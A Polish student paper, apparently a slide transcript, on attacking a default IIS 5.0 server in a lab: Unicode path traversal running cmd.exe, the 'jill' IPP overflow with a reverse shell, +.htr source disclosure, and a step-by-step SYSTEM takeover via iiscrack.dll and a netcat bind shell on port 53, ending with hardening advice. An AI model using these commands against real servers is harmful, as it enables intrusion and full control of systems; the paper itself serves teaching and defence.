IIS 5.0 błdy i luki w serwerze WWW

Transkrypt

1 IIS 5.0 błdy i luki w serwerze WWW

2 W pracy omówione zostan sposoby jakimi moe posłuy si intruz zamierzajcy włama si do serwera IIS, by zmieni zawarto umieszczonych na nim stron lub całkowicie przej kontrol na systemem. Pokazane zostan take metody zabezpieczenia serwera przed atakiem. Pakiet oprogramowania Internet Information Services (IIS) jest dołczony do systemu operacyjnego Windows. Jego podstawowym zadaniem jest pełnienie funkcji serwera WWW, ponadto oferuje równie moliwo uruchomienia serwerów FTP, SMTP, NNTP oraz proxy. IIS jest popularnym serwerem midzy innymi ze wzgldu na prostot konfiguracji. Po zainstalowaniu składników serwera nie trzeba wiele wysiłku, eby uruchomi serwis WWW. Z punktu widzenia uytkowników niezajmujcych si systemami komputerowymi ani bezpieczestwem, jest to dua zaleta. Jest to jednak równie dua zaleta dla intruzów. Wikszo uytkowników poprzestaje na podstawowej instalacji IIS, nie starajc si dodatkowo zabezpieczy serwera. Zwykle wic serwer IIS działa z domyln konfiguracj, co sprawia e jest on czstym celem ataków. W eksperymentach korzysta bd z dwóch wirtualnych maszyn. Na jednej z nich zainstalowany jest system operacyjny Windows 2000 Professional oraz pakiet IIS 5.0 z domylnymi ustawieniami (IP: ) komputer bdcy ofiar ataków. Druga maszyna działa pod systemem Mandrake Linux 10.1 (IP: ) komputer intruza. JAK ROZPOZNA SERWER IIS Aby rozpocz atak na serwer IIS intruz musi si najpierw upewni, e jego celem jest rzeczywicie serwer IIS. Jednym ze sposobów w jaki moe to zrobi jest tzw. badanie banerów. Proces pobierania strony z serwera polega na wysyłaniu da (od klienta do serwera) i otrzymaniu odpowiedzi (od serwera do klienta). W skład odpowiedzi serwera wchodzi zawarto strony oraz nagłówki HTTP. Domylnie skonfigurowany serwer IIS bez wahania ujawnia swoj tosamo, wysyłajc nastpujcy nagłówek: Server: Microsoft-IIS/5.0

3 Technik t mona zastosowa poprzez połczenie si z portem 80 serwera i wysłanie odpowiedniego cigu znaków jako danie, a nastpnie odczytanie nagłówków otrzymanej odpowiedzi. Do nawizania połczenia TCP z okrelonym portem danego serwera mona posłuy si narzdziem netcat. [ Po zainicjowaniu połczenia poleceniem nc wpisujemy danie: GET / HTTP/1.0, a nastpnie pusty wiersz. W odpowiedzi od serwera widzimy zapis: Server: Microsoft-IIS/5.0. Oznacza to, e na komputerze jest uruchomiony IIS w wersji 5.0. Przykład zastosowania tej metody został pokazany na rysunku poniej. Chcc zabezpieczy serwer przed identyfikacj poprzez badanie banera, powinnimy zmieni tre odpowiedzi banera. Nie jest to proste, poniewa w serwerze IIS 5.0 tre banera jest na stałe zapisana w kodzie programu. Mona jednak skorzysta z narzdzia UrlScan. W pliku konfiguracyjnym urlscan.ini zmieniamy wpis RemoveServerHeader=0 na RemoveServerHeader=1 Po wprowadzeniu tej zmiany z nagłówków odpowiedzi znika informacja o typie serwera. Wicej o UrlScan na stronie: [

4 Po sprawdzeniu, e mamy do czynienia z serwerem IIS, rozpoczynamy testowanie, na jakie metody ataku jest on podatny. PRZEGLDANIE SYSTEMU PLIKÓW Ataki zwane przegldanie systemu plików (ang. filesystem traversal) umoliwiaj odczytywanie plików znajdujcych si na serwerze, a niekiedy nawet zdalne wykonywanie polece. Idea jest prosta korzystajc z tradycyjnej sztuczki../ moemy uzyska dostp do dowolnego pliku na serwerze, a nawet wykonywa polecenia (uruchamiajc cmd.exe). Symbol../ uywany jest w URL-u w podobny sposób jak podczas zmiany biecego katalogu w wierszu polece. Przykład: Jeli jestemy w katalogu c:\temp\katalog, to po wywołaniu polecenia cd.. znajdziemy si stopie wyej, czyli w katalogu c:\temp. W przypadku URL sytuacja wyglda analogicznie. Umieszczajc../ w daniu wysłanym do serwera, intruz bdzie mógł porusza si po drzewie katalogów serwera. Gdybymy wysłali nastpujce danie: w odpowiedzi otrzymalibymy plik \dokumenty\2004\info.html z głównego katalogu serwera WWW. Jeli głównym katalogiem jest c:\inetpub, otrzymalibymy plik c:\inetpub\dokumenty\2004\info.html. Jeli natomiast wysłalibymy danie: otrzymalibymy plik c:\inetpub\dokumenty\2003\info.html. Umieszczajc symbol dwóch kropek spowodowalimy zmian katalogu z 2004 na katalog nadrzdny dokumenty, nastpnie dostalimy si do katalogu 2003, skd zadalimy pliku info.html. W obu przypadkach nie przekroczylimy naszych praw. Odczytalimy plik znajdujcy si w c:\inetpub. Co jednak stałoby si gdybymy chcieli odczyta plik: W tej sytuacji dwie kropki przenosz z katalogu c:\inetpub do katalogu nadrzdnego c:\, w którym znajduje si plik plik.txt. Jeli faktycznie udałoby si nam odczyta ten plik,

5 oznaczałoby to, e uzyskalimy dostp do informacji nie udostpnionych dla uytkowników serwera WWW. Ponadto, gdybymy tylko znali struktur katalogów serwera, moglibymy dosta si do kadego pliku. Przyjrzyjmy si kilku przykładom. Przegldanie systemu plików za pomoc Unicode Zasadniczo IIS 5.0 nie jest podatny na sztuczki z wykorzystaniem symbolu../ - przed wysłaniem pliku klientowi serwer sprawdza, czy w ciece dostpu nie wystpuje cig../ mogcy spowodowa wyjcie z głównego katalogu. Interesujca sytuacja ma miejsce, gdy w ciece wystpuj znaki Unicode. W takim przypadku IIS najwyraniej sprawdza ciek przed dekodowaniem tych znaków. Oznacza to, e po odebraniu dania: IIS w pierwszej kolejnoci sprawdza, czy danie nie zawiera podejrzanego symbolu../. Nastpnie dekoduje znaki Unicode. Cig %c0%af odpowiada znakowi / w Unicode, tak wic danie przetwarzane jest do nastpujcej postaci: co oznacza, e IIS dostarczy nam plik c:\plik.txt. Wykorzystujc t luk jestemy w stanie uzyska dostp do dowolnego pliku na serwerze, pod warunkiem, e znamy ciek dostpu do niego. Dostp uzyskamy z uprawnieniami konta IUSR_NAZWAKOMPUTERA, gdzie NAZWAKOMPUTERA jest netbiosow nazw serwera. To konto jest wykorzystywane do anonimowego dostpu z sieci do serwera WWW. Standardowo naley ono do grupy Gocie (Local Guests) na serwerze. Uprawnienia tego konta przyznawane s anonimowym uytkownikom serwera WWW. Poza kontem IUSR_NAZWAKOMPUTERA, mamy jeszcze konto SYSTEM (LocalSystem). Jest ono wykorzystywane przez system operacyjny do uruchamiania programów i sterowników. Nie jest kontem uytkownika. Konto to ma nieograniczony dostp do systemu operacyjnego. Jeli intruzowi udałoby si przej kontrol nad tym kontem, mógłby zrobi z systemem praktycznie wszystko. Załómy e znamy lokalizacj pliku, do którego chcemy uzyska dostp. Aby wysła danie moemy skorzysta z przegldarki lub wysła danie HTTP bezporednio, za pomoc programu netcat. W pierwszym przypadku wpisujemy je w polu adresu przegldarki, w drugim natomiast postpujemy podobnie jak przy badaniu banerów, tj. wpisujc:

6 nc GET /..%c0%afplik.txt Jeli plik, którego dotyczy danie, jest plikiem wykonywalnym, uzyskujemy dodatkowe moliwoci. Jeli znajduj si on w katalogu wirtualnym, w którym uytkownik IUSR_NAZWAKOMUTERA ma prawo wykonywania (na przykład /scripts), wówczas zostanie wykonany, a wynik zostanie zwrócony przez serwer. Moemy ponadto oszuka serwer, by uznał, e plik znajduje si w katalogu z prawem wykonywania nawet, jeli faktycznie jest inaczej. Wykorzystujc ponownie sztuczk z dwiema kropkami wchodzimy do katalogu /scripts, po czym wychodzimy do katalogu nadrzdnego i podajemy ciek dostpu do pliku w innym katalogu. Przykład: Serwer IIS bdzie sdził, e plik znajduje si w katalogu scripts cieka jest analizowana zanim cig..%c0%af.. zostanie zdekodowany do postaci../... Serwer nie wie zatem, e po wejciu do katalogu scripts przechodzimy dwa poziomy wyej i próbujemy uzyska dostp do /winnt/system32/cmd.exe. Warto wiedzie, e do wywoływanego pliku moemy przekazywa argumenty, posługujc si znakiem?. Przykład: Chcc wypisa zawarto katalogu c:\ wysyłamy nastpujce danie: dir+c:\ danie moemy wysła za pomoc przegldarki lub programu netcat

7 Luka przegldania systemu plików została poprawiona w Windows 2000 Service Pack 3. ATAKI PRZEZ PRZEPEŁNIENIE BUFORA Atak przez przepełnienie bufora, w skrócie, polega na przekazaniu programowi zbyt duej iloci danych, powodujc wykonanie przygotowanego przez intruza kodu, który w normalnych okolicznociach nie miałby prawa zosta wykonany. Dodatkowy kod trafia do innego obszaru pamici i wskutek błdu w programie, który niewłaciwie sprawdza rozmiar danych wejciowych, zostaje wykonany z uprawnieniami takimi samymi, jak wadliwy program. Poniewa IIS działa na koncie SYSTEM, które w Windows ma nieograniczon władz, przepełnienie bufora naley uwaa za najbardziej niebezpieczny rodzaj ataku, na jaki naraony jest serwer IIS. Przepełnienie bufora IPP Luka ta wystpuje w filtrze ISAPI.printer, którego zadaniem jest obsługa protokołu Internet Printing Protocol (IPP). Sama technologia ISAPI (Internet Services Application Programming Interface) umoliwia rozszerzanie funkcjonalnoci serwera WWW poprzez dołczanie do niego kodu implementujcego dodatkowe usługi.

8 Filtr ISAPI.printer jest domylnie instalowany na serwerze. Błd mona wykorzysta wysyłajc cig około 420 bajtów w nagłówku wysłanym w daniu ISAPI.printer. Po otrzymaniu takiego dania w IIS dochodzi do przepełnienia bufora i serwer przestaje działa. Jednak Windows 2000 automatycznie uruchamia IIS ponownie zaraz po awarii, co ma na celu zapewnienie jak najwikszej niezawodnoci usług sieciowych. W efekcie kod umieszczony w buforze zostaje wykonany. Luk wykorzystuje exploit zwany jill [ którego autorem jest dark spirit z beavuh.org. Exploit powoduje przepełnienie bufora w serwerze IIS i uruchamia na zdalnej maszynie powłok, do której dostp moe uzyska intruz łczc si z portem o wybranym numerze. Intruz rozpoczyna od nasłuchiwania na wybranym porcie TCP (np. 2006), za pomoc takiego narzdzia jak netcat: nc vv l p 2006 W drugim oknie polece intruz uruchamia exploita, podajc mu jako parametry: IP ofiary, IP maszyny nasłuchujcej oraz numer portu, na którym ma zosta udostpniona powłoka. Intruz jeszcze tylko musi wcisn [Enter] w okienku nasłuchiwania by połczy si z powłok. Nastpnie moe wywoływa dowolne polecenia z uprawnieniami konta SYSTEM.

9 Błd został naprawiony w Windows 2000 SP3. UJAWNIANIE KODU RÓDŁOWEGO Gdy klient wysyła do serwera danie otworzenia strony HTML, serwer bezporednio odsyła mu jej zawarto. Kiedy danie dotyczy strony zrealizowanej w ASP lub PHP, wówczas w pierwszej kolejnoci serwer wykonuje kod zawarty w skrypcie, a potem wysyła wyniki klientowi. W ten sposób klient nie ma dostpu do kodu ródłowego strony (skryptu), któr oglda. Ten fakt jest niekiedy wykorzystywany przez programistów, którzy umieszczaj w kodzie stron poufne informacje, jak choby nazwy uytkowników i hasła. Przykładowo, logowanie uytkownika moe wyglda nastpujco: if ( $username== admin ) && ($passwd== secret77 ) ) { $logged_in=1; }

10 W normalnych okolicznociach takie rozwizanie nie jest niebezpieczne, poniewa uytkownik nie moe zobaczy treci kodu ródłowego. Jeli jednak znalazłby luk w serwerze IIS umoliwiajc podgld kodu stron, wówczas hasło zostałoby ujawnione. Luka +.htr HTR jest jedn z pierwszych zaawansowanych technik skryptowych, jakie weszły w skład serwera IIS 2.0. Obecnie najczciej spotykanym zastosowaniem mechanizmu HTR jest zestaw skryptów dołczonych standardowo do serwera IIS. Ich zadaniem jest umoliwienie dostpu do haseł Windows NT przez serwer WWW. Uytkownicy mog za pomoc tych skryptów zmienia swoje hasła, natomiast administratorzy mog wykorzystywa je w zarzdzaniu hasłami. Gdy klient wysyła danie pliku.htr jest ono przekazywane do biblioteki ISM.DLL, która wskutek błdu zwraca zawarto pliku. W ten sposób intruz moe odczyta tre pliku.htr. Ten sam błd moe by wykorzystany do odczytania zawartoci pliku.asp. Wybieramy ciek dostpu do dowolnego pliku.asp: i dodajemy do niej +.htr: Gdy serwer IIS analizuje otrzymane danie, zwraca uwag na kocowy cig znaków.htr, wic postpuje tak samo jak w przypadku dowolnego pliku.htr przekazuje danie do biblioteki ISM.DLL. ISM.DLL usuwa ze cieki przyrostek +.htr i pokazuje zawarto pliku /global.asa. W podobny sposób mona postpi z plikami.asp i.ini. Jednak odczytana zostanie tre ródła pliku tylko do pierwszego wystpienia cigu <% - znaczniki <% i %> s ogranicznikami skryptów wykonywanych po stronie serwera. Chcc odczyta plik global.asa, intruz musi jedynie uruchomi program netcat i wpisa danie GET /global.asa+.htr. Oczywicie moe równie skorzysta z przegldarki i wpisa nastpujcy adres:

11 Dostp do poufnych informacji (na przykład nazwy uytkownika i hasła) moe znaczco ułatwi intruzowi włamanie do systemu. Najskuteczniejsz ochron przed ujawnieniem ukrytych informacji jest przestrzeganie zasad bezpiecznego programowania w kodzie ASP. Luka została naprawiona w Windows 2000 SP3. ZWIKSZANIE UPRAWNIE Intruz, który zdołał wedrze si do systemu i uruchomi powłok z uprawnieniami konta SYSTEM ma prawie nieograniczone moliwoci. Jednak nawet, gdy intruz dysponuje jedynie uprawnieniami konta anonimowego lub nieuprzywilejowanego, moe dokona zniszcze w systemie lub nawet przej uprawnienia konta SYSTEM. Jak kopiowa pliki na system ofiary Gdy jestemy zalogowani lokalnie do komputera z systemem Windows, moemy łatwo przekierowywa wyniki wykonywanego polecenia stosujc symbol >. Przykładowo, jeli wydamy nastpujce polecenie: dir c:\ > dirc.txt wyniki polecenia trafi do pliku dirc.txt. Metody tej nie mona jednak stosowa w przypadku polece wykonywanych za porednictwem cmd.exe ze wzgldu na ograniczenia przekierowa w serwerze IIS, chyba, e zmienimy nazw cmd.exe. Dlatego te pierwsz rzecz, jak robi intruz, jest skopiowanie

12 pliku cmd.exe do katalogu /scripts (podstawowe ustawienia bezpieczestwa Windows 2000 daj uytkownikowi nalecemu do grupy Wszyscy (Everyone) pełn kontrol nad tym katalogiem). Intruz wpisuje w przegldarce nastpujcy adres: +copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmdx.exe Kopia cmd.exe została umieszczona w katalogu /scripts, zatem intruz nie bdzie musiał wykonywa adnych sztuczek z przechodzeniem do innego katalogu, by uzyska do niej dostp. Łatwiej bdzie mu wydawa polecenia w systemie ofiary.

13 Jak tworzy pliki w systemie ofiary Wydajc polecenie w rodzaju echo > plik, intruz ma moliwo tworzenia nowych plików w zdalnym systemie za pomoc przegldarki, w której wpisuje adres: owy.txt Spowoduje to utworzenie pliku nowy.txt w katalogu /scripts. ATAK NA SERWER IIS ANALIZA KROK PO KROKU Przeanalizujmy teraz szczegółowy opis ataku na serwer IIS. Zobaczymy, jak serwer IIS ze standardowymi zabezpieczeniami, bez jakichkolwiek uaktualnie czy łat, pada ofiar intruza, który w piciu krokach zdobywa w systemie uprawnienia konta SYSTEM. Krok 1 poszukiwanie luk Najpierw intruz sprawdza, czy system jest podatny na atak Unicode.

14 katalogu c:\. Wyglda na to, e system jest podatny, poniewa udało si odczyta list plików w Krok 2 przygotowanie do umieszczenia plików na serwerze Chcc kontynuowa atak, intruz musi umieci na serwerze kilka plików. Mona tu skorzysta ze skryptu perla unicodeloader [ narzdzia, które umoliwia przesyłanie plików za porednictwem wygodnego interfejsu. Skrypt unicodeloader umieszcza na serwerze plik pomocniczy, który intruz otwiera (wpisujc okrelony adres), otrzymujc stron z formularzem słucym do przesyłania plików z komputera lokalnego na serwer. Wywoływany jest nastpujco: unicodeloader IP:port katalogwww Jako katalogwww podajemy nazw katalogu, w którym uytkownik IUSR_NAZWAKOMPUTERA moe wykonywa pliki. Jak zdylimy si przekona, warunek ten spełnia katalog c:\inetpub\scripts.

15 Intruz moe od tej pory przesyła pliki na serwer korzystajc ze strony upload.asp. Krok 3 umieszczenie plików na serwerze Po wpisaniu w przegldarce adresu intruz bdzie mógł za pomoc kilku klikni umieszcza pliki w katalogu wirtualnym /scripts. W kolejnym kroku intruz umieszcza na serwerze pliki niezbdne do przeprowadzenia dalszej czci ataku. Bdzie mu potrzebny plik, który umoliwi przejcie uprawnie konta

16 SYSTEM. W tym celu wykorzystana zostanie luka znana jako RevertToSelf w bibliotece DLL ISAPI. Luka wystpuje w mechanizmie InProcessIsapiApps, umoliwiajcym omijanie zabezpiecze aplikacji przy uyciu wywoła RevertToSelf w DLL ISAPI. W uproszczeniu, wywołanie RevertToSelf spowoduje, e biecy wtek zmieni swój kontekst bezpieczestwa z uprawnie IUSR_NAZWAKOMPUTERA na uprawnienia konta, z którego prawami działa IIS (inetinfo.exe) czyli SYSTEM. HD Moore z digitaloffence.net udostpnia plik iiscrack.dll [ który wykorzystuje omówion luk i umoliwia wykonywanie dowolnych polece z uprawnieniami konta SYSTEM. By zastosowa exploit naley zmieni nazw tego pliku na nazw okrelon w kluczu Metabazy IIS/LM/W3SVC/InProcessIsapiApps. Intruz musi zatem jedynie otworzy stron upload.asp i umieci na serwerze plik o nazwie zmienionej na httpodbc.dll. Wspomniany błd został naprawiony w Windows 2000 SP3. Nastpnym punktem planu intruza jest przygotowanie tylnej furtki w systemie ofiary. Intruz moe zastosowa program netcat (wersja dla Windows) [ który moe umieci na serwerze korzystajc ze strony upload.asp. Krok 4 uruchomienie tylnej furtki z uprawnieniami konta SYSTEM Aby wywoła httpodbc.dll w katalogu wirtualnym /scripts, intruz po prostu wpisuje w przegldarce adres: Uzyskuje w ten sposób dostp do strony, na której znajduje si pole tekstowe umoliwiajce wydawanie polece. Wpisane polecenie zostanie wykonane z uprawnieniami konta SYSTEM. Podczas testowania, okazało si, e nie do koca działa to poprawnie. Przy wydaniu polecenia: c:\winnt\system32\cmd.exe /c

17 pojawiał si nastpujcy błd Wystarczyło jednak w adresie cmd=c%3a%5cwinnt%5csystem32%5ccmd.exe+%2fc&submitter=execute skasowa ostatni człon:

18 &submitter=execute co sprawiło, e exploit zadziałał. Intruz wydaje wic nastpujce polecenie: c:\inetpub\scripts\nc l p 53 e cmd.exe I tak jak wczeniej kasuje ostatni człon w adresie, tj.

19 &submitter=execute W efekcie zobaczy on stron z potwierdzeniem poprawnego wykonania polecenia. Uruchamia ono powłok dostpn przez port TCP o numerze 53. Wybór numeru portu ma znacznie, poniewa gdyby atakowany serwer znajdował si za firewallem, istnieje spora szansa na to, e bdzie on akceptował połczenia AXFR DNS (port TCP 53). Krok 5 ostateczny cios Intruzowi pozostaje jedynie połczy si z powłok, któr uruchomił. Moe w tym celu wykorzysta program netcat.

20 JAK POPRAWI BEZPIECZESTWO Oto kilka metod postpowania słucych poprawie poziomu bezpieczestwa serwera IIS, których stosowanie znacznie ograniczy ryzyko włamania. 1. Na wstpie kilka wanych wskazówek odnonie instalacji: o przygotujmy oddzieln partycj lub oddzielny dysk dla zawartoci stron WWW udaremni to wikszo z omówionych ataków. Narzdzia słuce do włamywania si na serwery IIS zakładaj zwykle, e strony WWW s przechowywane w standardowych katalogach. o partycja systemowa oraz partycja zawierajca strony WWW powinny by partycjami NTFS. Pozwala to w wikszym stopniu kontrolowa ustawienia bezpieczestwa, korzystajc z list kontroli dostpu (ang. Access Control List - ACL). o instalujmy najnowsze pakiety uaktualnie i łaty. 2. Usumy z serwera przykładowe aplikacje i katalogi. Przykłady nie s do niczego potrzebne na pracujcym serwerze. Postpujmy według zasady: jeli co nie jest nam potrzebne, usumy to.

21 3. Wyłczmy wszystkie zbdne usługi, szczególnie serwer telnetu, jeli z niego nie korzystamy. 4. Powinnimy ponadto rozway podział plików udostpnianych na stronach pomidzy odrbne katalogi. 5. IIS jest wstpnie skonfigurowany tak, by obsługiwa podstawowe typy plików, takie jak.asp i.shtm. Gdy serwer odbiera danie dotyczce jednego z takich plików, jest ono obsługiwane przez bibliotek DLL. Jeli obsługa niektórych plików nie jest nam potrzebna, usumy ich mapowania, postpujc zgodnie z ponisz instrukcj: o otwieramy Menadera usług internetowych (Internet services manager), o klikamy prawym przyciskiem na nazw serwera, wybieramy z menu Właciwoci (Properties), o właciwoci główne (Master Properties), o wybieramy Usługa WWW->Edytuj->Katalog macierzysty->konfiguracja (WWW Service->Edit->HomeDirectory->Configuration). Bibliografia: - Magazyn Hakin9 nr 4/ Wykrywanie, analiza i przeciwdziałanie atakom hackerów w Checz Point Firewall-1 NG [ - strony www wymienione w pracy